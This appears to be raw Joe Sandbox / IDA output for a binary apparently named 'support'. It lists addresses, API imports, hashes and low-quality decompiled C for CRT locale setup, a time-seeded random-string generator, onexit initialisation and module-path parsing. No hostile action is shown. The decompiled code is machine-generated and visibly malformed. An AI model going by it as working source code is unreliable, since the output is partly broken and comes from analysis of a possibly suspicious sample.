0x003bdaa8
0x003bdb16
0x003bdb16
0x003bdb18
0x003bdaaa
0x003bdaaa
0x003bdaad
0x003bdab2
0x003bdab8
0x00000000
0x003bdaba
0x003bdaba
0x00000000
0x003bdaba
0x003bdab8
0x003bdaa8
0x003bd96b
0x003bd97a
0x00000000
0x003bd97c
0x003bd97c
0x003bd97a
0x003bd93f
0x003bd93f
0x003bd93f
0x003bd916
0x003bd916
0x003bd919
0x003bd91b
0x003bd920
0x00000000
0x003bd922
0x003bd925
0x003bd92f
0x003bd931
0x003bd920
0x003bdb22
0x003bdb25
0x003bdb3d

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 003BD96E

Strings

[^K/, xrefs: 003BD8F4

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: fgetc
String ID: [^K/
API String ID: 2807381905-4166871755
Opcode ID: 00b3b18a2dc258ef34405d4c0e31d5bed6512f8c737df4629e0923fe14ac5d2c
Instruction ID: 98aff592f77e113164d0536aaeb3dafb479f325024129e2f8ae7de438c43c820
Opcode Fuzzy Hash: 00b3b18a2dc258ef34405d4c0e31d5bed6512f8c737df4629e0923fe14ac5d2c
Instruction Fuzzy Hash: A1817F31D04109DFCF16CFA8C880AEEBBB5EF49314F618669D922E7691E731A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 003BE210 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E003BE210(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				char _v8;
				char _v16;
				signed int _v20;
				void* _v24;
				intOrPtr* _v28;
				signed int _v32;
				char _v44;
				signed char _v68;
				signed int _t33;
				signed int _t34;
				signed int _t36;
				intOrPtr _t37;
				signed int* _t40;
				void* _t43;
				void* _t51;
				intOrPtr _t55;
				char* _t61;
				signed int _t65;
				void* _t70;
				intOrPtr* _t72;
				signed int _t73;
				void* _t75;
				void* _t76;

				_t76 = _t75 - 0x1c;
				_t33 =  *0x3c500c; // 0x4b5ee95b
				_t34 = _t33 ^ _t73;
				_v20 = _t34;
				 *[fs:0x0] =  &_v16;
				_t51 = __ecx;
				__imp__??0_Lockit@std@@QAE@H@Z(0, _t34, __edi, __esi, __ebx,  *[fs:0x0], E003BF791, 0xffffffff);
				_v8 = 0;
				_t36 =  *0x6f6390; // 0x0
				_t55 = __imp__?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A;
				_v32 = _t36;
				__imp__??Bid@locale@std@@QAEIXZ();
				_t65 = _t36;
				_t37 =  *((intOrPtr*)(__ecx + 4));
				if(_t65 >=  *((intOrPtr*)(_t37 + 0xc))) {
					_t68 = 0;
					goto L7;
				} else {
					__ecx =  *((intOrPtr*)(__eax + 8));
					__esi =  *((intOrPtr*)(__ecx + __edi * 4));
					if( *((intOrPtr*)(__ecx + __edi * 4)) != 0) {
						L14:
						__imp__??1_Lockit@std@@QAE@XZ();
						 *[fs:0x0] = _v16;
						return E003BE3D0(_v20 ^ _t73);
					} else {
						L7:
						if( *((char*)(_t37 + 0x14)) == 0) {
							L10:
							if(_t68 != 0) {
								goto L14;
							} else {
								goto L11;
							}
						} else {
							__imp__?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ();
							if(_t65 >=  *((intOrPtr*)(_t37 + 0xc))) {
								L11:
								_t68 = _v32;
								if(_t68 != 0) {
									goto L14;
								} else {
									_t40 =  &_v32;
									__imp__?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z(_t40, _t51);
									_t76 = _t76 + 8;
									if(_t40 == 0xffffffff) {
										_t61 =  &_v44;
										E003B30A0(_t61);
										_push(0x3c3730);
										_push(_t61);
										L003BF2CD();
										asm("int3");
										_t55 = _t61 -  *((intOrPtr*)(_t61 - 4));
										_push(_t73);
										_push(_t68);
										_t70 = _t55 - 0x68;
										_t43 = E003BD2B0(_t70);
										if((_v68 & 0x00000001) != 0) {
											_push(0xb0);
											E003BE78C(_t43, _t70);
										}
										return _t70;
									} else {
										_t72 = _v32;
										_v28 = _t72;
										_v8 = 1;
										E003BE39E(_t72);
										 *((intOrPtr*)( *_t72 + 4))();
										_t68 = _v32;
										 *0x6f6390 = _v32;
										goto L14;
									}
								}
							} else {
								_t68 =  *((intOrPtr*)( *((intOrPtr*)(_t37 + 8)) + _t65 * 4));
								goto L10;
							}
						}
					}
				}
			}

0x003be221
0x003be224
0x003be229
0x003be22b
0x003be235
0x003be23b
0x003be242
0x003be248
0x003be24f
0x003be254
0x003be25a
0x003be25d
0x003be263
0x003be265
0x003be26b
0x003be279
0x00000000
0x003be26d
0x003be26d
0x003be270
0x003be275
0x003be2d3
0x003be2d6
0x003be2e1
0x003be2f9
0x003be277
0x003be27b
0x003be27f
0x003be292
0x003be294
0x00000000
0x00000000
0x00000000
0x00000000
0x003be281
0x003be281
0x003be28a
0x003be296
0x003be296
0x003be29b
0x00000000
0x003be29d
0x003be29d
0x003be2a2
0x003be2a8
0x003be2ae
0x003be2fa
0x003be2fd
0x003be302
0x003be309
0x003be30a
0x003be30f
0x003be310
0x003bde20
0x003bde23
0x003bde24
0x003bde29
0x003bde32
0x003bde34
0x003bde3a
0x003bde3f
0x003bde46
0x003be2b0
0x003be2b0
0x003be2b3
0x003be2b7
0x003be2bb
0x003be2c7
0x003be2ca
0x003be2cd
0x00000000
0x003be2cd
0x003be2ae
0x003be28c
0x003be28f
0x00000000
0x003be28f
0x003be28a
0x003be27f
0x003be275

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,4B5EE95B,?,00000000,?,?,?,00000000,003BF791,000000FF,?,003BE05F), ref: 003BE242
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,00000000,003BF791,000000FF), ref: 003BE25D
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,00000000,003BF791,000000FF), ref: 003BE281
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,00000000,?,?,00000000,003BF791,000000FF), ref: 003BE2A2
std::_Facet_Register.LIBCPMT ref: 003BE2BB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,00000000,003BF791,000000FF), ref: 003BE2D6
_CxxThrowException.VCRUNTIME140(?,003C3730,?,?,?,?,00000000,003BF791,000000FF), ref: 003BE30A

Strings

[^K/, xrefs: 003BE224

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@ExceptionFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterThrowV42@@Vfacet@locale@2@std::_
String ID: [^K/
API String ID: 3546165850-4166871755
Opcode ID: 96ecdcdfee1ca7ca811ae5b0a0dafcb6a13edca8dabd912e429bc9cca0701436
Instruction ID: b5e6b04bc8af069e526d6ad57dfdb606281fd17cc33c383bd11e45c3494ea85b
Opcode Fuzzy Hash: 96ecdcdfee1ca7ca811ae5b0a0dafcb6a13edca8dabd912e429bc9cca0701436
Instruction Fuzzy Hash: D231AF75D00214CFCB16EFA8D849AEEBBB9EB04724F058569E916EB791D734BD00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003B5320 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,4B5EE95B,?,006F5B9C), ref: 003B5352
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 003B536D
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140 ref: 003B5391
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?), ref: 003B53B2
std::_Facet_Register.LIBCPMT ref: 003B53CB
??1_Lockit@std@@QAE@XZ.MSVCP140 ref: 003B53E6
_CxxThrowException.VCRUNTIME140(?,003C3730), ref: 003B541A

Strings

[^K/, xrefs: 003B5334

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@D@std@@ExceptionFacet_Getcat@?$ctype@Getgloballocale@locale@std@@Locimp@12@RegisterThrowV42@@Vfacet@locale@2@std::_
String ID: [^K/
API String ID: 240979420-4166871755
Opcode ID: f837e4489c0468d3a0f12724213cf5ecda56c355f3d37eb9d311de3b9cfb4435
Instruction ID: 8bf7b31313acba3bb3ac92ca233ab78b3afb1b7a2ec9dbfcb34036ea62b4ab43
Opcode Fuzzy Hash: f837e4489c0468d3a0f12724213cf5ecda56c355f3d37eb9d311de3b9cfb4435
Instruction Fuzzy Hash: A031AC769006188FCB16DF58D848BEEB7F8EB04724F054169E916AB791D774BD00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003B3300 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E003B3300(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v72;
				signed int _v76;
				char _v80;
				signed int _t51;
				signed int _t52;
				int _t53;
				signed int _t56;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t69;
				void* _t74;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t83;
				void* _t89;
				void* _t90;
				void* _t91;
				char _t94;
				char _t96;
				void* _t99;
				char _t100;
				signed int _t102;
				void* _t103;
				void* _t105;

				_t91 = __edx;
				_t51 =  *0x3c500c; // 0x4b5ee95b
				_t52 = _t51 ^ _t102;
				_v20 = _t52;
				_t53 =  &_v16;
				 *[fs:0x0] = _t53;
				__imp___time64(0, _t52, __edi, __esi, __ebx,  *[fs:0x0], E003BF6B0, 0xffffffff);
				srand(_t53);
				_t105 = _t103 - 0x44 + 8;
				_v28 = 0;
				_v24 = 0xf;
				_v44 = 0;
				_push(0);
				E003B51D0( &_v44, _t91, 0x3c145d);
				_v8 = 0;
				_push(0xc);
				_v56 = 0;
				_v52 = 0xf;
				_v72 = 0;
				E003B51D0( &_v72, _t91, 0x3c1460);
				_v8 = 1;
				_t99 = 0x1f;
				_t96 = _v72;
				_t77 = _v56 - 1;
				_v76 = _t77;
				do {
					_t56 = rand();
					_t83 = _v28;
					_t78 = _v24;
					_t59 =  >=  ? _t96 :  &_v72;
					_t94 =  *((intOrPtr*)(( >=  ? _t96 :  &_v72) + _t56 % _t77));
					_v48 = _t94;
					if(_t83 >= _v24) {
						_push(_v48);
						_v80 = 0;
						_push(_v80);
						E003B59B0(_t78,  &_v44, _t96, _t83);
					} else {
						_t26 = _t83 + 1; // 0x1
						_v28 = _t26;
						_t74 =  >=  ? _v44 :  &_v44;
						 *((char*)(_t74 + _t83)) = _t94;
						 *((char*)(_t74 + _t83 + 1)) = 0;
					}
					_t77 = _v76;
					_t99 = _t99 - 1;
				} while (_t99 != 0);
				_t79 = _v24;
				_t100 = _v44;
				_t62 =  >=  ? _t100 :  &_v44;
				_v76 =  >=  ? _t100 :  &_v44;
				_t63 = _v52;
				if(_t63 < 0x10) {
					L10:
					if(_t79 >= 0x10) {
						_t45 = _t79 + 1; // 0x10
						_t89 = _t45;
						_t66 = _t100;
						if(_t89 >= 0x1000) {
							_t100 =  *((intOrPtr*)(_t100 - 4));
							_t89 = _t89 + 0x23;
							if(_t66 > 0x1f) {
								__imp___invalid_parameter_noinfo_noreturn();
							}
						}
						_push(_t89);
						E003BE78C(_t66, _t100);
					}
					 *[fs:0x0] = _v16;
					return E003BE3D0(_v20 ^ _t102);
				}
				_t43 = _t63 + 1; // 0x11
				_t90 = _t43;
				_t69 = _t96;
				if(_t90 >= 0x1000) {
					_t96 =  *((intOrPtr*)(_t96 - 4));
					_t90 = _t90 + 0x23;
					if(_t69 > 0x1f) {
						__imp___invalid_parameter_noinfo_noreturn();
					}
				}
				_push(_t90);
				E003BE78C(_t69, _t96);
				_t105 = _t105 + 8;
				goto L10;
			}

0x003b3300
0x003b3314
0x003b3319
0x003b331b
0x003b3322
0x003b3325
0x003b332d
0x003b3334
0x003b333a
0x003b333d
0x003b3347
0x003b334e
0x003b3352
0x003b3359
0x003b335e
0x003b3368
0x003b336f
0x003b3376
0x003b337d
0x003b3381
0x003b3386
0x003b338a
0x003b3392
0x003b3395
0x003b3396
0x003b33a0
0x003b33a0
0x003b33a8
0x003b33b4
0x003b33b7
0x003b33ba
0x003b33bd
0x003b33c2
0x003b33de
0x003b33e1
0x003b33e5
0x003b33ec
0x003b33c4
0x003b33c4
0x003b33ca
0x003b33d0
0x003b33d4
0x003b33d7
0x003b33d7
0x003b33f1
0x003b33f4
0x003b33f4
0x003b33f9
0x003b33ff
0x003b3405
0x003b3408
0x003b340b
0x003b3411
0x003b3440
0x003b3443
0x003b3445
0x003b3445
0x003b3448
0x003b3450
0x003b3452
0x003b3455
0x003b3460
0x003b3462
0x003b3462
0x003b3460
0x003b3468
0x003b346a
0x003b346f
0x003b3478
0x003b3490
0x003b3490
0x003b3413
0x003b3413
0x003b3416
0x003b341e
0x003b3420
0x003b3423
0x003b342e
0x003b3430
0x003b3430
0x003b342e
0x003b3436
0x003b3438
0x003b343d
0x00000000

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,4B5EE95B), ref: 003B332D
srand.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 003B3334

Part of subcall function 003B51D0: memmove.VCRUNTIME140(006F5B9C,?,?), ref: 003B51FD

Part of subcall function 003B51D0: memcpy.VCRUNTIME140(00000000,?,?), ref: 003B52AC

rand.API-MS-WIN-CRT-UTILITY-L1-1-0(003C1460,0000000C,003C145D,00000000), ref: 003B33A0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?), ref: 003B3430
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?), ref: 003B3462

Strings

[^K/, xrefs: 003B3314

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$_time64memcpymemmoverandsrand
String ID: [^K/
API String ID: 2607574214-4166871755
Opcode ID: 45d0e5a985855d5975e824c48a78cd06abcc2ada24d69754e6f511a5f87c8467
Instruction ID: b9c4c4809de93e10933c72bd2c390e265ab662f11e4ee14a48169fd48fe95897
Opcode Fuzzy Hash: 45d0e5a985855d5975e824c48a78cd06abcc2ada24d69754e6f511a5f87c8467
Instruction Fuzzy Hash: 9841C031E00218DFDB16DFA8CC85BEEFBB5EF09318F540129E605A7682DB756A44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003BE5BE Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 80%

			E003BE5BE(void* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t28;
				intOrPtr _t29;
				signed int _t32;
				void* _t46;
				signed int _t52;

				if( *0x6f5f59 == 0) {
					_t52 = _a4;
					__eflags = _t52;
					if(_t52 == 0) {
						L4:
						_t19 = E003BEF89();
						__eflags = _t19;
						if(_t19 == 0) {
							L9:
							_t20 =  *0x3c500c; // 0x4b5ee95b
							_push(_t46);
							_push(0x20);
							asm("ror eax, cl");
							_t23 = (_t20 & 0x0000001f | 0xffffffff) ^  *0x3c500c;
							__eflags = _t23;
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							goto L10;
						} else {
							__eflags = _t52;
							if(_t52 != 0) {
								goto L9;
							} else {
								_push(0x6f5f5c);
								L003BF2FD();
								__eflags = _t19;
								if(_t19 != 0) {
									L8:
									_t24 = 0;
								} else {
									_push(0x6f5f68);
									L003BF2FD();
									__eflags = _t19;
									if(_t19 == 0) {
										L10:
										 *0x6f5f59 = 1;
										_t24 = 1;
									} else {
										goto L8;
									}
								}
							}
						}
						return _t24;
					} else {
						__eflags = _t52 - 1;
						if(_t52 != 1) {
							E003BEF95(__edx, _t46, _t52, 5);
							asm("int3");
							E003BED70(0x3c3658, 8);
							_v8 = _v8 & 0x00000000;
							__eflags =  *0x3b0000 - 0x5a4d; // 0x5a4d
							if(__eflags != 0) {
								L19:
								_v8 = 0xfffffffe;
								_t28 = 0;
								__eflags = 0;
							} else {
								_t29 =  *0x3b003c; // 0xf0
								__eflags =  *((intOrPtr*)(_t29 + 0x3b0000)) - 0x4550;
								if( *((intOrPtr*)(_t29 + 0x3b0000)) != 0x4550) {
									goto L19;
								} else {
									__eflags =  *((intOrPtr*)(_t29 + 0x3b0018)) - 0x10b;
									if( *((intOrPtr*)(_t29 + 0x3b0018)) != 0x10b) {
										goto L19;
									} else {
										_t32 = E003BE50F(0x3b0000, _a4 - 0x3b0000);
										__eflags = _t32;
										if(_t32 == 0) {
											goto L19;
										} else {
											__eflags =  *(_t32 + 0x24);
											if( *(_t32 + 0x24) < 0) {
												goto L19;
											} else {
												_v8 = 0xfffffffe;
												_t28 = 1;
											}
										}
									}
								}
							}
							 *[fs:0x0] = _v20;
							return _t28;
						} else {
							goto L4;
						}
					}
				} else {
					return 1;
				}
			}

0x003be5cb
0x003be5d2
0x003be5d5
0x003be5d7
0x003be5de
0x003be5de
0x003be5e3
0x003be5e5
0x003be60d
0x003be60d
0x003be615
0x003be61e
0x003be626
0x003be628
0x003be628
0x003be62e
0x003be631
0x003be634
0x003be637
0x003be638
0x003be639
0x003be63f
0x003be642
0x003be648
0x003be64b
0x003be64c
0x003be64d
0x00000000
0x003be5e7
0x003be5e7
0x003be5e9
0x00000000
0x003be5eb
0x003be5eb
0x003be5f0
0x003be5f6
0x003be5f8
0x003be609
0x003be609
0x003be5fa
0x003be5fa
0x003be5ff
0x003be605
0x003be607
0x003be64f
0x003be64f
0x003be656
0x00000000
0x00000000
0x00000000
0x003be607
0x003be5f8
0x003be5e9
0x003be65a
0x003be5d9
0x003be5d9
0x003be5dc
0x003be65d
0x003be662
0x003be66a
0x003be66f
0x003be678
0x003be67f
0x003be6de
0x003be6de
0x003be6e5
0x003be6e5
0x003be681
0x003be681
0x003be686
0x003be690
0x00000000
0x003be692
0x003be697
0x003be69e
0x00000000
0x003be6a0
0x003be6ac
0x003be6b3
0x003be6b5
0x00000000
0x003be6b7
0x003be6b7
0x003be6bb
0x00000000
0x003be6bd
0x003be6bd
0x003be6c4
0x003be6c4
0x003be6bb
0x003be6b5
0x003be69e
0x003be690
0x003be6ea
0x003be6f6
0x00000000
0x00000000
0x00000000
0x003be5dc
0x003be5cd
0x003be5d0
0x003be5d0

APIs

_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(006F5F5C), ref: 003BE5F0
_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(006F5F68), ref: 003BE5FF

Strings

h_o, xrefs: 003BE63A
[^K/, xrefs: 003BE60D
\_o, xrefs: 003BE619

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: _initialize_onexit_table
String ID: [^K/$\_o$h_o
API String ID: 2450287516-1396030820
Opcode ID: e52d6b7d740fd73da715bb0d7407388a907f03cbe13a88e718c1a62f63e31343
Instruction ID: cfff6e9b12ef674a4ba1847e43d448e730fcda389076a3e962b1b5ef8f2a3367
Opcode Fuzzy Hash: e52d6b7d740fd73da715bb0d7407388a907f03cbe13a88e718c1a62f63e31343
Instruction Fuzzy Hash: 29110636D01A186ACF12DF6C98017DE77E65F12318F1680A6EF15EF981D770DD408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 003BC730 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E003BC730(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				int _v8;
				char _v16;
				signed int _v20;
				char _v284;
				void _v540;
				intOrPtr _v544;
				int _v548;
				char _v564;
				char* _v568;
				char* _v572;
				signed int _t54;
				signed int _t55;
				intOrPtr _t59;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t71;
				intOrPtr _t74;
				signed int _t79;
				signed int _t83;
				char _t86;
				char* _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr _t101;
				void* _t102;
				signed char* _t103;
				void* _t104;
				void* _t105;
				intOrPtr _t106;
				void* _t107;
				void* _t108;
				void* _t111;
				signed int _t114;
				signed int _t115;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(0xffffffff);
				_push(E003BFDBB);
				_push( *[fs:0x0]);
				_t122 = _t121 - 0x22c;
				_t54 =  *0x3c500c; // 0x4b5ee95b
				_t55 = _t54 ^ _t120;
				_v20 = _t55;
				_push(_t55);
				 *[fs:0x0] =  &_v16;
				_v568 = __ecx;
				_v572 = __ecx;
				_v572 = __ecx;
				GetModuleFileNameA(0,  &_v284, 0x104);
				_t90 =  &_v284;
				_v548 = 0;
				_v544 = 0xf;
				_t104 = _t90 + 1;
				_v564 = 0;
				do {
					_t59 =  *_t90;
					_t90 = _t90 + 1;
				} while (_t59 != 0);
				_push(_t90 - _t104);
				E003B51D0( &_v564, _t104,  &_v284);
				_t86 = _v564;
				_t114 = _v548;
				_t111 =  >=  ? _t86 :  &_v564;
				if(_t114 == 0) {
					L10:
					_t115 = _t114 | 0xffffffff;
					goto L11;
				} else {
					memset( &_v540, 0, 0x100);
					_t122 = _t122 + 0xc;
					_t103 = 0x3c15c0;
					_t108 = 2;
					do {
						_t79 =  *_t103 & 0x000000ff;
						_t19 =  &(_t103[1]); // 0x3000002f
						_t103 = _t19;
						 *((char*)(_t120 + _t79 - 0x218)) = 1;
						_t108 = _t108 - 1;
					} while (_t108 != 0);
					_t22 = _t114 - 1; // -1
					_t119 =  <  ? _t22 : _t114 | 0xffffffff;
					_t114 = _t119 + _t111;
					if( *((intOrPtr*)(_t120 + ( *(_t119 + _t111) & 0x000000ff) - 0x218)) != 0) {
						L9:
						_t115 = _t114 - _t111;
						L11:
						_t62 = _v544;
						if(_t62 >= 0x10) {
							_t30 = _t62 + 1; // 0x11
							_t102 = _t30;
							_t74 = _t86;
							if(_t102 >= 0x1000) {
								_t86 =  *((intOrPtr*)(_t86 - 4));
								_t102 = _t102 + 0x23;
								if(_t74 > 0x1f) {
									__imp___invalid_parameter_noinfo_noreturn();
								}
							}
							_push(_t102);
							E003BE78C(_t74, _t86);
							_t122 = _t122 + 8;
						}
						_t93 =  &_v284;
						_v548 = 0;
						_v544 = 0xf;
						_t105 = _t93 + 1;
						_v564 = 0;
						do {
							_t63 =  *_t93;
							_t93 = _t93 + 1;
						} while (_t63 != 0);
						_push(_t93 - _t105);
						E003B51D0( &_v564, _t105,  &_v284);
						_t87 = _v568;
						_v8 = 0;
						_t116 =  <  ? _v548 : _t115;
						_push( <  ? _v548 : _t115);
						_t67 =  >=  ? _v564 :  &_v564;
						 *(_t87 + 0x10) = 0;
						 *((intOrPtr*)(_t87 + 0x14)) = 0xf;
						 *_t87 = 0;
						E003B51D0(_t87, _t105,  >=  ? _v564 :  &_v564);
						_t106 = _v544;
						if(_t106 >= 0x10) {
							_t101 = _v564;
							_t107 = _t106 + 1;
							_t71 = _t101;
							if(_t107 >= 0x1000) {
								_t101 =  *((intOrPtr*)(_t101 - 4));
								_t107 = _t107 + 0x23;
								if(_t71 > 0x1f) {
									__imp___invalid_parameter_noinfo_noreturn();
								}
							}
							_push(_t107);
							E003BE78C(_t71, _t101);
						}
						 *[fs:0x0] = _v16;
						return E003BE3D0(_v20 ^ _t120);
					}
					while(_t114 != _t111) {
						_t83 =  *(_t114 - 1) & 0x000000ff;
						_t114 = _t114 - 1;
						if( *((intOrPtr*)(_t120 + _t83 - 0x218)) == 0) {
							continue;
						}
						goto L9;
					}
					goto L10;
				}
			}

0x003bc733
0x003bc735
0x003bc740
0x003bc741
0x003bc747
0x003bc74c
0x003bc74e
0x003bc754
0x003bc758
0x003bc75e
0x003bc764
0x003bc775
0x003bc77e
0x003bc784
0x003bc78a
0x003bc794
0x003bc79e
0x003bc7a1
0x003bc7a8
0x003bc7a8
0x003bc7aa
0x003bc7ab
0x003bc7b7
0x003bc7bf
0x003bc7d1
0x003bc7d7
0x003bc7dd
0x003bc7e2
0x003bc858
0x003bc858
0x00000000
0x003bc7e4
0x003bc7f2
0x003bc7f7
0x003bc7fa
0x003bc7ff
0x003bc810
0x003bc810
0x003bc813
0x003bc813
